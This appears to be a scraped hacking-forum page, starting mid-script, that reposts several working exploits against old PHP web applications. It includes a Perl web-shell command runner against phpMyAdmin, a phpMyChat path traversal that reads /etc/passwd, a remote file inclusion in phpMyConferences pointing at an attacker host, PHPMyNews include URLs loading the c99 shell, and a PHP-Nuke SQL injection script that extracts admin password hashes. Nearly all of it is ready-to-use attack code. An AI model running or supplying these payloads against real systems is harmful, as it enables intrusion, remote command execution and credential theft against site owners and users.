$cmd = URLEncode($cmd); $cmd .= "\r\n"; #I know it look stupid, But trust me. it works better this way. $http = $ARGV[1]; $http .= "helps.php?c="; $http .= $cmd; $socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n"; httpcon($socks,"GET",$ip,$http,"!"); while($ans = <$socks>){ if(($ans =~ /<\/pre>(.*)/)) { print $1; $allow = 0; } if($allow == 1){ print $ans;} if(($ans =~ /<pre>(.*)/)) { if($1 eq /<\/pre>/){ print $1;} $allow = 1; } } $allow = 0; $ans = 'AN'; } PHPMyAdmin Null Password Sheel Injector. Navaro(HCE) bPhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability PHP Code: ************************************************************** ***************** # Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability # Author : ajann # Dork : phpMyChat 0.14.5 , phpMyChat # Vuln; ************************************************************** ***************** [File] localization/languages.lib.php3 [/File] [Code,1] languages.lib.php3 Error: require("./${ChatPath}config/config.lib.php3"); require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3"); require("./${ChatPath}lib/clean.lib.php3"); Key [:] ChatPath=[file] Example: http://target.com/path/localization/languages.lib.php3?ChatPath= / /etc/pass wd Black_hat_cr(HCE) phpMyConferences <= 8.0.2 Remote File Inclusion Code: # phpMyConferences <= 8.0.2 Remote File Inclusion # # Found by mfp.c => mfp.c (at) hotmail (dot) com [email concealed] [brazil rlz] # # Greetz: F-117, Silver lords e pra tu pri :* ################################################ # # # Arquivo: library.inc.php # # Bug: # if (!$gloaded_modules[$image_name]) # { # include($lvc_modules_dir.'/'.$module_name.'.module.php'); # $gloaded_modules[$module_name] = true; # } # # # Exploit: # # http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library .inc.php?lvc_modules_dir=http://attack/ # # # THANKS: Milw0rm,str0ke, google # # ############################################### Black_hat_cr(HCE) PHPMyNews 1.4 <= (cfg_include_dir) Remote File Include Vulnerability CODE: require($cfg_include_dir.'langues/'.$cfg_language.'.inc'.$cfg_ext); require($cfg_include_dir.'database/'.$cfg_database.'.inc'.$cfg_ext); require($cfg_include_dir.'form.inc'.$cfg_ext); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: Code: [phpmynews_path]/include/disp_form.php3?cfg_include_dir=c99 [phpmynews_path]/include/disp_smileys.php3?cfg_include_dir=c99 [phpmynews_path]/include/little_news.php3?cfg_include_dir=c99 [phpmynews_path]/include/index.php3?cfg_include_dir=c99 Black_hat_cr(HCE) PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit Code: <? /* Neo Security Team - Exploit made by Paisterist on 2006-10-22 http://www.neosecurityteam.net */ $host="localhost"; $path="/phpnuke/"; $prefix="nuke_"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1"; if ($fp) { $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n"; $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n"; $p.="Referer: http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n"; $p.="Accept-Language: es-ar\r\n"; $p.="Content-Type: application/x-www-form-urlencoded\r\n"; $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $p.="Host: localhost\r\n"; $p.="Content-Length: ".strlen($data)."\r\n"; $p.="Pragma: no-cache\r\n"; $p.="Connection: keep-alive\r\n\r\n"; $p.=$data; fwrite($fp, $p); while (!feof($fp)) { $content .= fread($fp, 4096); } preg_match("/([a-zA-Z0-9]{32})/", $content, $matches); print_r($matches); } // ==Real Proof of Concept exploit==